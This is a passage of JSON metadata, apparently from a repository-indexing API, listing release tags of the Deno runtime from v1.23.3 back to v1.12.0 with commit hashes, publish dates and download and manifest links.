z/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/